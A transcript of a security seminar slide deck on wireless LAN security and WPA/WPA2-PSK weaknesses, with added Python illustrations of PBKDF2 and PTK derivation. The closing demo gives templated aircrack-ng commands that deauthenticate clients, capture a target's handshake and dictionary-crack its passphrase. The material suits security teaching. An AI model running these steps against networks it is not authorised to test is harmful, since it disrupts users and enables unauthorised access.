Wireless Security null seminar
Transcript of Wireless Security null seminar
Page 1
Wireless Security
Nilesh Sapariya, CEH v8, CCNA
Security Engineer
About me:
Page 2
Agenda
1) Introduction to WLAN Security
2) WLAN Architectures
3) WPA / WPA2 PSK (Personal) Cracking
Page 3
WLAN
1) In computing, Wireless LAN or Wireless Local Area Network is a term for a Local Area Network that does not need cables to connect the different devices.
2) Instead, radio waves are used to communicate.
Page 4
From Fixed Device to Mobile Device
Page 5
These devices don't have a LAN port
Page 6
Only and Best Mode of Connectivity
Page 7
Wireless is a more efficient, many-to-one access method.
“Right-sized” Edge (one port supports multiple users and devices simultaneously): with Wi-Fi, ports can easily be cut in half.
Existing Wired Network Edge (1:1 ratio of ports to devices).
(Figure: representative 12-person workgroup: 12 VoIP phones, 7 desktop PCs, 5 laptop PCs, 1 wireless AP for mobile devices, guests, etc., 6 conference room & public area ports, 5 other devices such as printer, copier, fax, and 12 ports reserved for future use.)
Page 8
Wi-Fi comes with problems:
• Challenging Wi-Fi environment: RF noise, metal objects with wheels, building materials
• Client density and diversity challenges
• Security against uncontrolled wireless devices and infrastructure attacks
Page 9
Security Risk
Uncontrolled Wireless Devices
• Rogue APs
• Laptops acting as bridges
• Misconfigured WLAN settings on laptops
• Ad-hoc networks
Attacks against WLAN infrastructure
• Denial of Service / flooding
• Man-in-the-Middle
• WEP (Wired Equivalent Privacy) cracking (aircrack-ng is the famous tool)
• WPA/WPA2 (Wi-Fi Protected Access) cracking (aircrack-ng is the famous tool)
Page 10
Security Risk
(Figure: Ad Hoc, Access Point MAC Spoofing, Rogue User and Mis-configured Access Point in the office, against a server.)
And more such kinds of attacks
Page 11
Wireless Standards - 802.11a, 802.11b/g/n, and 802.11ac
• 1997: IEEE (Institute of Electrical and Electronics Engineers) created the first WLAN standard
• Called 802.11
• 802.11 only supports a max network bandwidth of 2 Mbps (too slow for most applications)
Page 12
WLAN Operation
• Wireless LAN (WLAN) can operate in 2 different frequency ranges
• 2.4 GHz (802.11 b/g/n)
• 4.9 or 5 GHz (802.11 a/h/j/n)
• Note: your wireless card can only be on one channel at a time (it has a single radio)
• Every country has allowed channels, users and maximum power levels
Page 13
• Fair distribution of clients across channels
• e.g. Channels 1, 6, 11
• Fair distribution of clients across bands
• e.g. 2.4 GHz and 5 GHz
(Figure: three APs on channels 1, 6 and 11)
Page 14
WLAN Setup
“Fat” Access Point: the AP itself carries the 802.11a/b/g/n radios and antennas plus policy, mobility, forwarding, encryption, authentication and management. Many devices to manage, many entry points to secure.
“Thin” Access Points: the APs carry only the 802.11a/b/g/n radios and antennas; policy, mobility, forwarding, encryption, authentication and management move to a Centralized Mobility Controller. Centralized management, centralized security.
Page 15
Wardriving
• How to find SSIDs in your area
• How to find hidden SSIDs
• Tools used: i. inSSIDer ii. CommView for WiFi
Page 16
Understanding WPA / WPA2 (Wi-Fi Protected Access )
Page 17
Wireless Encryption
• The main source of vulnerability associated with wireless networks is the method of encryption. There are a few different types of wireless encryption, including:
• WEP
• WPA
• WPA2
Page 18
WEP
• Stands for Wired Equivalent Privacy.
• WEP is recognizable by its key of 10 or 26 hexadecimal digits.
Page 19
WPA or WPA2
• Stands for Wi-Fi Protected Access
• Created to provide stronger security
• Still able to be cracked if a short password is used.
• If a long passphrase or password is used, these protocols are virtually not crackable.
• WPA-PSK with TKIP or AES uses a Pre-Shared Key (PSK) passphrase that is more than 7 and less than 64 characters in length.
Page 20
Why WPA?
WEP (Wired Equivalent Privacy) is broken beyond repair:
whether you are using a 64-bit or a 128-bit key, WEP will be broken.
Page 21
Weaknesses of WEP
1. Poor key management
• WEP uses the same key for authentication/encryption
• Provides no mechanism for session key refreshing
• Static key encryption used
2. One-way authentication
Page 22
WEP Replacement
WPA (intermediate solution by the Wi-Fi Alliance): uses TKIP (Temporal Key Integrity Protocol); based on WEP; hardware change not required, firmware update only.
WPA2 (long-term solution): uses CCMP (Counter Mode Cipher Block Chaining Message Authentication Code Protocol); based on AES; hardware change required.
Both come in two modes: Personal (PSK) and Enterprise (802.1X + RADIUS).
Page 23
Difference between WPA-Personal & WPA-Enterprise
Wireless Architecture
How to create a profile for WPA-Personal and WPA-Enterprise
Page 24
WEP: Static Key Encryption
Client and AP each hold the static WEP key.
Probe Request / Response
Authentication Request/Response, Association Request/Response
Data encrypted with the static key
Page 25
WPA: Non-Static Key
Client and AP each hold a static key.
Probe Request / Response
Authentication, Association
Dynamic key generated first
Data encrypted with the dynamic key
How are dynamic keys created?
Page 26
WPA / WPA2 PSK(Personal) Cracking
Page 27
WPA Pre-shared Key
Passphrase (8-63 characters) → PBKDF2 → Pre-Shared Key (256 bit)
Page 28
PBKDF2
• Password Based Key Derivation Function
• RFC 2898
• PBKDF2(Passphrase, SSID, ssidLen, 4096, 256)
• 4096 - number of times the passphrase is hashed
• 256 - intended key length of the PSK, in bits
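As an added illustration that is not part of the slides, the passphrase-to-PSK mapping just described, written out in Python: a hand-rolled PBKDF2-HMAC-SHA1 following RFC 2898 so the "4096 times hashed" loop is visible, checked against Python's hashlib. The function names and the sample SSIDs are my own; the passphrase "password" with SSID "IEEE" is the published IEEE 802.11 test vector.

```python
import hashlib
import hmac

PSK_ITERATIONS = 4096   # slide: number of times the passphrase is hashed
PSK_LEN_BYTES = 32      # slide: 256-bit intended key length


def validate_passphrase(passphrase: str) -> None:
    """WPA-Personal passphrases are 8 to 63 printable ASCII characters (slide: 'Passphrase (8-63)')."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 characters long")
    if not all(32 <= ord(c) <= 126 for c in passphrase):
        raise ValueError("WPA passphrase must be printable ASCII")


def pbkdf2_hmac_sha1_manual(password: bytes, salt: bytes, iterations: int, dklen: int) -> bytes:
    """RFC 2898 PBKDF2 with HMAC-SHA1, written out so the iteration loop is visible.

    For each output block i: U1 = HMAC(P, S || INT(i)), U_j = HMAC(P, U_{j-1}),
    T_i = U1 xor U2 xor ... xor U_c. The derived key is T_1 || T_2 || ... truncated to dklen.
    """
    hlen = hashlib.sha1().digest_size          # 20 bytes per block
    n_blocks = -(-dklen // hlen)               # ceil(dklen / hlen); 2 blocks for a 32-byte PSK
    derived = b""
    for i in range(1, n_blocks + 1):
        u = hmac.new(password, salt + i.to_bytes(4, "big"), hashlib.sha1).digest()
        t = int.from_bytes(u, "big")
        for _ in range(iterations - 1):        # the remaining 4095 HMAC rounds
            u = hmac.new(password, u, hashlib.sha1).digest()
            t ^= int.from_bytes(u, "big")
        derived += t.to_bytes(hlen, "big")
    return derived[:dklen]


def wpa_psk(passphrase: str, ssid: str, manual: bool = False) -> bytes:
    """PSK = PBKDF2(passphrase, SSID, ssidLen, 4096, 256): the SSID is the salt, ssidLen its byte length."""
    validate_passphrase(passphrase)
    pw, salt = passphrase.encode("ascii"), ssid.encode("utf-8")
    if manual:
        return pbkdf2_hmac_sha1_manual(pw, salt, PSK_ITERATIONS, PSK_LEN_BYTES)
    return hashlib.pbkdf2_hmac("sha1", pw, salt, PSK_ITERATIONS, dklen=PSK_LEN_BYTES)


if __name__ == "__main__":
    # Published IEEE 802.11 test vector: passphrase "password", SSID "IEEE".
    print(wpa_psk("password", "IEEE").hex())
    # Same passphrase on two constructed SSIDs gives two different PSKs, because the SSID is the salt.
    print(wpa_psk("correct horse battery", "HomeNet-A").hex())
    print(wpa_psk("correct horse battery", "HomeNet-B").hex())
```

Two things the code makes concrete for a defender: because the SSID is the salt, the same passphrase yields a different PSK on every network, so a non-default SSID forces any precomputed passphrase table to be rebuilt per network; and the fixed 4096 iterations set the per-guess cost on which the earlier "short password can be cracked, long passphrase virtually not" slide rests.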
Page 29
How does the Client know?
• Beacon frames?
• Probe Response packets from the AP?
• Can be used to create a WPA/WPA2 honeypot as well!
Page 30
How WEP Works
1) We try to collect a large number of data packets
2) A bunch of those data packets contain weak IVs
3) We run them through the algorithm or aircrack-ng and get the key
Then how to crack WPA-PSK?
Page 31
Let's “Shake the hand” #4-way Handshake
Supplicant (client) and Authenticator (AP) each hold the 256-bit Pre-Shared Key.
Probe Request / Response; Authentication Request/Response, Association Request/Response
Message 1: AP sends ANonce to the client; the client can now compute the PTK
Message 2: client sends SNonce to the AP; the AP can now compute the PTK
Message 3: key installation
Message 4: key install acknowledgement + MIC
Key installed on both sides
Page 32
Pairwise Transient Key
• PTK = Function(PMK, ANonce, SNonce, Authenticator MAC, Supplicant MAC)
• PMK = Pre-Shared Key (Pairwise Master Key)
• ANonce = random value generated by the AP
• SNonce = random value generated by the client
• Authenticator MAC = AP MAC
• Supplicant MAC = client MAC
• MIC - Message Integrity Check (signature algorithm)
Page 33
WPA Working: Block Diagram
Passphrase (8-63 characters) → PBKDF2 → Pre-Shared Key (256 bit)
Pre-Shared Key + 4-way handshake values (SNonce, ANonce, AP MAC, Client MAC) → PTK
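The "PTK = Function(PMK, ANonce, SNonce, Authenticator MAC, Supplicant MAC)" line and the block diagram above leave the function unnamed; in IEEE 802.11i it is PRF-512 built from HMAC-SHA1. The following is an added example, not code from the slides, that derives the PTK from the PSK and the four handshake values and splits it into its key parts. The AP MAC is the BSSID shown later on the slides; the client MAC, nonces, passphrase and SSID are constructed sample values, and the function names are my own.

```python
import hashlib
import hmac

PTK_LABEL = b"Pairwise key expansion"   # fixed label from IEEE 802.11i


def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """PMK for WPA-Personal = PSK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"), ssid.encode("utf-8"), 4096, dklen=32)


def prf(key: bytes, label: bytes, data: bytes, out_bits: int) -> bytes:
    """IEEE 802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ...
    until at least n bits are produced, then truncate to n bits."""
    out = b""
    for i in range((out_bits + 159) // 160):     # 4 rounds of 160 bits for PRF-512
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[: out_bits // 8]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> dict:
    """PTK = PRF-512(PMK, "Pairwise key expansion",
                     Min(AA,SPA) || Max(AA,SPA) || Min(ANonce,SNonce) || Max(ANonce,SNonce)).

    AA = authenticator (AP) MAC, SPA = supplicant (client) MAC, 6 bytes each; nonces are 32 bytes.
    The Min/Max ordering is why both sides reach the same PTK regardless of which role they play.
    """
    assert len(aa) == len(spa) == 6 and len(anonce) == len(snonce) == 32
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf(pmk, PTK_LABEL, data, 512)
    return {
        "KCK": ptk[0:16],        # Key Confirmation Key: keys the MIC on handshake messages 2, 3 and 4
        "KEK": ptk[16:32],       # Key Encryption Key: wraps the group key carried in message 3
        "TK": ptk[32:48],        # Temporal Key: encrypts the data frames
        "TKIP_MIC": ptk[48:64],  # Michael keys used only by TKIP; CCMP/AES uses just the first 384 bits
    }


# Constructed sample handshake values (not a real capture). The AP MAC is the BSSID from the slides;
# the client MAC is a locally administered placeholder; the nonces are fixed so the run is repeatable.
SAMPLE_AP_MAC = bytes.fromhex("0014bfe0e8d5")
SAMPLE_CLIENT_MAC = bytes.fromhex("020000000001")
SAMPLE_ANONCE = hashlib.sha256(b"constructed ANonce").digest()
SAMPLE_SNONCE = hashlib.sha256(b"constructed SNonce").digest()


def sample_ptk(passphrase: str = "correct horse battery", ssid: str = "HomeNet-A") -> dict:
    """Full chain from the block diagram: passphrase -> PBKDF2 -> PSK -> 4-way handshake values -> PTK."""
    return derive_ptk(wpa_psk(passphrase, ssid), SAMPLE_AP_MAC, SAMPLE_CLIENT_MAC, SAMPLE_ANONCE, SAMPLE_SNONCE)


if __name__ == "__main__":
    for name, part in sample_ptk().items():
        print(f"{name:9s} {part.hex()}")
```

Every input to derive_ptk other than the PMK is sent in the clear during the handshake, which is the structural reason the next slide can call WPA-PSK susceptible to a dictionary attack: the only secret in the whole chain is the passphrase, so the strength of that passphrase is the entire margin.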
Page 34
WPA-PSK Susceptible to Dictionary Attack
Page 35
WPA / WPA2 PSK(Personal) Cracking
DEMO
Page 36
External Wireless Card
• Alfa Networks AWUS036H USB-based card
• Already integrated with BackTrack and Kali
• Allows for packet sniffing
• Allows for packet injection
• We will use this in our demo session
Page 37
Software Setup
• Run Kali Linux in a VM
• Connect the Alfa adapter
Page 38
Understanding Wireless Sniffing
• Wireless: monitor mode
• When you put the card in monitor mode, it will accept all the packets it sees on the current channel
• Kali has an inbuilt tool which helps to quickly put the card into monitor mode and sniff the packets
• We will use the tool airmon-ng to put the card into monitor mode (part of the aircrack-ng suite of tools)
Page 39
Some Basic Terms
• MAC address or physical address is a unique identifier assigned to network interfaces for communications
• Access point >> Wireless router
• SSID (service set identifier) >> Network Name
• BSSID (basic service set identification ) >> MAC address of the access point
Page 40
Using Kali Linux or BT
• Some basic BackTrack terms:
• wlan0 - wireless interface
• mon0 - monitor mode interface
• Handshake - refers to the negotiation process between the computer and a WiFi server using WPA encryption. Needed to crack WPA/WPA2.
• Dictionary - a list of common passwords.
• .cap file - used to store captured packets.
Page 41
Tools Used
• Airmon-ng >> Places different cards in monitor mode
• Airodump-ng (packet sniffer) >> Tool used to listen to wireless routers in the area.
• Aireplay-ng (packet injector) >> Aireplay-ng is used to inject frames. Its primary function is to generate traffic for later use in aircrack-ng for cracking the WEP and WPA-PSK keys.
• Aircrack-ng >> Cracks WEP and WPA (dictionary attack) keys.
Page 42
Let's Hack
Page 43
Let's Start
This will list all of the wireless cards that support monitor (not injection) mode.
The “(monitor mode enabled)” message means that the card has successfully been put into monitor mode. Note the name of the new monitor interface, mine is mon0.
Page 44
• Airodump will now list all of the wireless networks in your area.
Page 45
• airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ [monitor interface]
Replace [channel] with the channel of your target network. Paste the network BSSID where [bssid] is, and replace [monitor interface] with the name of your monitor-enabled interface (mon0).
Page 46
• Airodump will now monitor only the target network, allowing us to capture more specific information about it.
NOTE: What we're really doing now is waiting for a device to connect or reconnect to the network, forcing the router to send out the four-way handshake that we need to capture in order to crack the password.
Page 47
aireplay-ng -0 2 -a [router bssid] -c [client bssid] mon0
Page 48
Upon hitting Enter, you’ll see aireplay-ng send the packets, and within moments, you should see this message appear on the airodump-ng screen!
Page 49
Final Step
• aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap
• -a is the method aircrack will use to crack the handshake; 2 = WPA method.
• -b stands for bssid; replace [router bssid] with the BSSID of the target router, mine is 00:14:BF:E0:E8:D5.
• -w stands for wordlist; replace [path to wordlist] with the path to a wordlist that you have downloaded. I have a wordlist called “wpa.txt” in the root folder.
• /root/Desktop/*.cap is the path to the .cap file containing the password
Page 50
If the passphrase is in the wordlist, then aircrack-ng will show it to you like this